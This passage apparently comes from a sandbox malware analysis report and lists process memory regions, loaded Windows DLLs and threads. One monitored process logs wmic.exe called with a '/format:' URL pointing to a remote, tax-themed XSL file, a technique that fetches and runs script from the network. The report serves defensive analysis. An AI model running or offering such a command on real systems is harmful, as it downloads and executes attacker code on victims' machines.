
Region:
	              id = 1784
	        start_va = 0x24d05280000
	          end_va = 0x24d05280fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d05280000"
	        filename = ""

Region:
	              id = 1785
	        start_va = 0x24d05360000
	          end_va = 0x24d0536ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d05360000"
	        filename = ""

Region:
	              id = 1786
	        start_va = 0x24d05470000
	          end_va = 0x24d055f7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d05470000"
	        filename = ""

Region:
	              id = 1787
	        start_va = 0x24d05600000
	          end_va = 0x24d05780fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d05600000"
	        filename = ""

Region:
	              id = 1788
	        start_va = 0x24d05790000
	          end_va = 0x24d06b8ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d05790000"
	        filename = ""

Region:
	              id = 1789
	        start_va = 0x7ffc13a20000
	          end_va = 0x7ffc13a33fff
	     entry_point = 0x7ffc13a20000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 1790
	        start_va = 0x7ffc13a40000
	          end_va = 0x7ffc13a8afff
	     entry_point = 0x7ffc13a40000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 1791
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 1792
	        start_va = 0x7ffc13c50000
	          end_va = 0x7ffc14293fff
	     entry_point = 0x7ffc13c50000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 1793
	        start_va = 0x7ffc14490000
	          end_va = 0x7ffc144d2fff
	     entry_point = 0x7ffc14490000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 1794
	        start_va = 0x7ffc14740000
	          end_va = 0x7ffc147f4fff
	     entry_point = 0x7ffc14740000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 1795
	        start_va = 0x7ffc14a70000
	          end_va = 0x7ffc15fcefff
	     entry_point = 0x7ffc14a70000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 1796
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 1797
	        start_va = 0x7ffc173a0000
	          end_va = 0x7ffc173f1fff
	     entry_point = 0x7ffc173a0000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 1798
	        start_va = 0x7ffc123a0000
	          end_va = 0x7ffc12435fff
	     entry_point = 0x7ffc123a0000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 1799
	        start_va = 0xe8ebcc0000
	          end_va = 0xe8ebcfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000e8ebcc0000"
	        filename = ""

Region:
	              id = 1800
	        start_va = 0x24d05290000
	          end_va = 0x24d05291fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d05290000"
	        filename = ""

Region:
	              id = 1801
	        start_va = 0x24d052a0000
	          end_va = 0x24d052a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d052a0000"
	        filename = ""

Region:
	              id = 1802
	        start_va = 0x24d06c10000
	          end_va = 0x24d06c1ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d06c10000"
	        filename = ""

Region:
	              id = 1803
	        start_va = 0x24d06c20000
	          end_va = 0x24d06f56fff
	     entry_point = 0x24d06c20000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1804
	        start_va = 0x24d06f60000
	          end_va = 0x24d07170fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d06f60000"
	        filename = ""

Region:
	              id = 1805
	        start_va = 0x24d07180000
	          end_va = 0x24d07393fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d07180000"
	        filename = ""

Region:
	              id = 1806
	        start_va = 0x24d073a0000
	          end_va = 0x24d074acfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d073a0000"
	        filename = ""

Region:
	              id = 1807
	        start_va = 0x24d074b0000
	          end_va = 0x24d076c9fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d074b0000"
	        filename = ""

Region:
	              id = 1808
	        start_va = 0x24d076d0000
	          end_va = 0x24d077e2fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d076d0000"
	        filename = ""

Region:
	              id = 1809
	        start_va = 0x7ffc16810000
	          end_va = 0x7ffc16969fff
	     entry_point = 0x7ffc16810000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 1810
	        start_va = 0x24d052b0000
	          end_va = 0x24d052b3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d052b0000"
	        filename = ""

Region:
	              id = 1811
	        start_va = 0x24d077f0000
	          end_va = 0x24d078abfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d077f0000"
	        filename = ""

Region:
	              id = 1812
	        start_va = 0x7ffc119f0000
	          end_va = 0x7ffc11a11fff
	     entry_point = 0x7ffc119f0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 1813
	        start_va = 0x7ffc120e0000
	          end_va = 0x7ffc120f2fff
	     entry_point = 0x7ffc120e0000
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 1814
	        start_va = 0x7ffc13830000
	          end_va = 0x7ffc13885fff
	     entry_point = 0x7ffc13830000
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 1815
	        start_va = 0x24d052c0000
	          end_va = 0x24d052c6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d052c0000"
	        filename = ""

Region:
	              id = 1816
	        start_va = 0x24d052e0000
	          end_va = 0x24d052e0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d052e0000"
	        filename = ""

Region:
	              id = 1817
	        start_va = 0x24d052f0000
	          end_va = 0x24d052f0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d052f0000"
	        filename = ""

Region:
	              id = 1818
	        start_va = 0x24d05300000
	          end_va = 0x24d05300fff
	     entry_point = 0x24d05300000
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 1819
	        start_va = 0x24d05310000
	          end_va = 0x24d05314fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d05310000"
	        filename = ""

Region:
	              id = 1820
	        start_va = 0x24d05320000
	          end_va = 0x24d05321fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d05320000"
	        filename = ""

Region:
	              id = 1821
	        start_va = 0x24d078b0000
	          end_va = 0x24d0793bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d078b0000"
	        filename = ""

Region:
	              id = 1822
	        start_va = 0x7ffc097b0000
	          end_va = 0x7ffc09a23fff
	     entry_point = 0x7ffc097b0000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")


Thread:
	id = 182
	os_tid = 0xb54


Thread:
	id = 183
	os_tid = 0xb44


Thread:
	id = 184
	os_tid = 0xc74


Thread:
	id = 185
	os_tid = 0x9c0


Process:
	id = "10"
	image_name = "wmic.exe"
	filename = "c:\\windows\\system32\\wbem\\wmic.exe"
	page_root = "0x67880000"
	os_pid = "0x434"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "8"
	os_parent_pid = "0xcd4"
	cmd_line = "wmic  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" "
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1830
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1831
	        start_va = 0xd7edd10000
	          end_va = 0xd7edd8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7edd10000"
	        filename = ""

Region:
	              id = 1832
	        start_va = 0xd7ede00000
	          end_va = 0xd7edffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ede00000"
	        filename = ""

Region:
	              id = 1833
	        start_va = 0x2ad20490000
	          end_va = 0x2ad204affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20490000"
	        filename = ""

Region:
	              id = 1834
	        start_va = 0x2ad204b0000
	          end_va = 0x2ad204c4fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad204b0000"
	        filename = ""

Region:
	              id = 1835
	        start_va = 0x2ad204d0000
	          end_va = 0x2ad204d3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad204d0000"
	        filename = ""

Region:
	              id = 1836
	        start_va = 0x2ad204e0000
	          end_va = 0x2ad204e0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad204e0000"
	        filename = ""

Region:
	              id = 1837
	        start_va = 0x2ad204f0000
	          end_va = 0x2ad204f1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad204f0000"
	        filename = ""

Region:
	              id = 1838
	        start_va = 0x7df5ffb60000
	          end_va = 0x7ff5ffb5ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ffb60000"
	        filename = ""

Region:
	              id = 1839
	        start_va = 0x7ff66e390000
	          end_va = 0x7ff66e3b2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff66e390000"
	        filename = ""

Region:
	              id = 1840
	        start_va = 0x7ff66e670000
	          end_va = 0x7ff66e6f1fff
	     entry_point = 0x7ff66e670000
	     region_type = mapped_file
	            name = "wmic.exe"
	        filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")

Region:
	              id = 1841
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1842
	        start_va = 0x2ad20490000
	          end_va = 0x2ad2049ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20490000"
	        filename = ""

Region:
	              id = 1843
	        start_va = 0x2ad205d0000
	          end_va = 0x2ad206cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad205d0000"
	        filename = ""

Region:
	              id = 1844
	        start_va = 0x7ff66e290000
	          end_va = 0x7ff66e38ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff66e290000"
	        filename = ""

Region:
	              id = 1845
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 1846
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 1847
	        start_va = 0xd7ee000000
	          end_va = 0xd7ee07ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000d7ee000000"
	        filename = ""

Region:
	              id = 1848
	        start_va = 0x2ad204a0000
	          end_va = 0x2ad204a6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad204a0000"
	        filename = ""

Region:
	              id = 1849
	        start_va = 0x2ad20500000
	          end_va = 0x2ad205bdfff
	     entry_point = 0x2ad20500000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1850
	        start_va = 0x2ad20870000
	          end_va = 0x2ad2087ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20870000"
	        filename = ""

Region:
	              id = 1851
	        start_va = 0x7ffbfe150000
	          end_va = 0x7ffbfe19dfff
	     entry_point = 0x7ffbfe150000
	     region_type = mapped_file
	            name = "framedynos.dll"
	        filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")

Region:
	              id = 1852
	        start_va = 0x7ffc0c8d0000
	          end_va = 0x7ffc0c907fff
	     entry_point = 0x7ffc0c8d0000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")

Region:
	              id = 1853
	        start_va = 0x7ffc136a0000
	          end_va = 0x7ffc136ccfff
	     entry_point = 0x7ffc136a0000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")

Region:
	              id = 1854
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 1855
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 1856
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 1857
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 1858
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 1859
	        start_va = 0x2ad205c0000
	          end_va = 0x2ad205c6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad205c0000"
	        filename = ""

Region:
	              id = 1860
	        start_va = 0x2ad206d0000
	          end_va = 0x2ad207acfff
	     entry_point = 0x2ad206d0000
	     region_type = mapped_file
	            name = "rpcss.dll"
	        filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")

Region:
	              id = 1861
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 1862
	        start_va = 0x2ad206d0000
	          end_va = 0x2ad206d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad206d0000"
	        filename = ""

Region:
	              id = 1863
	        start_va = 0x7ffc16550000
	          end_va = 0x7ffc165f6fff
	     entry_point = 0x7ffc16550000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 1864
	        start_va = 0x2ad206e0000
	          end_va = 0x2ad206e0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad206e0000"
	        filename = ""

Region:
	              id = 1865
	        start_va = 0x7ffc06b80000
	          end_va = 0x7ffc06b90fff
	     entry_point = 0x7ffc06b80000
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 1866
	        start_va = 0x7ffc16970000
	          end_va = 0x7ffc169dafff
	     entry_point = 0x7ffc16970000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 1867
	        start_va = 0x7ffc07e60000
	          end_va = 0x7ffc07edefff
	     entry_point = 0x7ffc07e60000
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 1868
	        start_va = 0x7ffc13950000
	          end_va = 0x7ffc13978fff
	     entry_point = 0x7ffc13950000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 1869
	        start_va = 0x2ad20880000
	          end_va = 0x2ad20bb6fff
	     entry_point = 0x2ad20880000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1870
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 1871
	        start_va = 0x2ad206f0000
	          end_va = 0x2ad20832fff
	     entry_point = 0x2ad206f0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 1872
	        start_va = 0x7ffbfc900000
	          end_va = 0x7ffbfcb3efff
	     entry_point = 0x7ffbfc900000
	     region_type = mapped_file
	            name = "msxml3.dll"
	        filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")

Region:
	              id = 1873
	        start_va = 0x2ad206f0000
	          end_va = 0x2ad207bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad206f0000"
	        filename = ""

Region:
	              id = 1874
	        start_va = 0x2ad206f0000
	          end_va = 0x2ad2073ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad206f0000"
	        filename = ""

Region:
	              id = 1875
	        start_va = 0x2ad207b0000
	          end_va = 0x2ad207bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad207b0000"
	        filename = ""

Region:
	              id = 1876
	        start_va = 0x2ad20bc0000
	          end_va = 0x2ad20d7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20bc0000"
	        filename = ""

Region:
	              id = 1877
	        start_va = 0x2ad20bc0000
	          end_va = 0x2ad20cdffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20bc0000"
	        filename = ""

Region:
	              id = 1878
	        start_va = 0x2ad20d70000
	          end_va = 0x2ad20d7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d70000"
	        filename = ""

Region:
	              id = 1879
	        start_va = 0x2ad207c0000
	          end_va = 0x2ad2084ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad207c0000"
	        filename = ""

Region:
	              id = 1880
	        start_va = 0x2ad207c0000
	          end_va = 0x2ad2083ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad207c0000"
	        filename = ""

Region:
	              id = 1881
	        start_va = 0x2ad20840000
	          end_va = 0x2ad2084ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20840000"
	        filename = ""

Region:
	              id = 1882
	        start_va = 0x2ad20740000
	          end_va = 0x2ad2079ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20740000"
	        filename = ""

Region:
	              id = 1883
	        start_va = 0x2ad206f0000
	          end_va = 0x2ad206f1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad206f0000"
	        filename = ""

Region:
	              id = 1884
	        start_va = 0x2ad20700000
	          end_va = 0x2ad20700fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad20700000"
	        filename = ""

Region:
	              id = 1885
	        start_va = 0x2ad20730000
	          end_va = 0x2ad2073ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20730000"
	        filename = ""

Region:
	              id = 1886
	        start_va = 0x2ad20bc0000
	          end_va = 0x2ad20c9ffff
	     entry_point = 0x2ad20bc0000
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")

Region:
	              id = 1887
	        start_va = 0x2ad20cd0000
	          end_va = 0x2ad20cdffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20cd0000"
	        filename = ""

Region:
	              id = 1888
	        start_va = 0x2ad20d80000
	          end_va = 0x2ad2117ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20d80000"
	        filename = ""

Region:
	              id = 1889
	        start_va = 0x2ad20710000
	          end_va = 0x2ad20710fff
	     entry_point = 0x2ad20710000
	     region_type = mapped_file
	            name = "msxml3r.dll"
	        filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")

Region:
	              id = 1890
	        start_va = 0x2ad20740000
	          end_va = 0x2ad2075ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20740000"
	        filename = ""

Region:
	              id = 1891
	        start_va = 0x2ad20790000
	          end_va = 0x2ad2079ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20790000"
	        filename = ""

Region:
	              id = 1892
	        start_va = 0x7ffc079e0000
	          end_va = 0x7ffc07b97fff
	     entry_point = 0x7ffc079e0000
	     region_type = mapped_file
	            name = "urlmon.dll"
	        filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")

Region:
	              id = 1893
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 1894
	        start_va = 0x7ffc14740000
	          end_va = 0x7ffc147f4fff
	     entry_point = 0x7ffc14740000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 1895
	        start_va = 0x7ffc173a0000
	          end_va = 0x7ffc173f1fff
	     entry_point = 0x7ffc173a0000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 1896
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 1897
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 1898
	        start_va = 0x7ffc0d740000
	          end_va = 0x7ffc0dac1fff
	     entry_point = 0x7ffc0d740000
	     region_type = mapped_file
	            name = "iertutil.dll"
	        filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")

Region:
	              id = 1899
	        start_va = 0x7ffc13c50000
	          end_va = 0x7ffc14293fff
	     entry_point = 0x7ffc13c50000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 1900
	        start_va = 0x7ffc14490000
	          end_va = 0x7ffc144d2fff
	     entry_point = 0x7ffc14490000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 1901
	        start_va = 0x7ffc13a40000
	          end_va = 0x7ffc13a8afff
	     entry_point = 0x7ffc13a40000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 1902
	        start_va = 0x7ffc13a20000
	          end_va = 0x7ffc13a33fff
	     entry_point = 0x7ffc13a20000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 1903
	        start_va = 0x2ad207c0000
	          end_va = 0x2ad207f8fff
	     entry_point = 0x2ad207c0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 1904
	        start_va = 0x2ad20830000
	          end_va = 0x2ad2083ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000002ad20830000"
	        filename = ""

Region:
	              id = 1905
	        start_va = 0x2ad21180000
	          end_va = 0x2ad21307fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000002ad21180000"
	        filename = ""

Region:
	              id = 1906
	        start_va = 0x7ffc167d0000
	          end_va = 0x7ffc1680afff
	     entry_point = 0x7ffc167d0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 1907
	        start_va = 0x2ad20720000
	          end_va = 0x2ad2072ffff
	     entry_point = 0x2ad20720000
	     region_type = mapped_file
	            name = "wmic.exe.mui"
	        filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui")

Region:
	              id = 1908
	        start_va = 0x2ad21310000
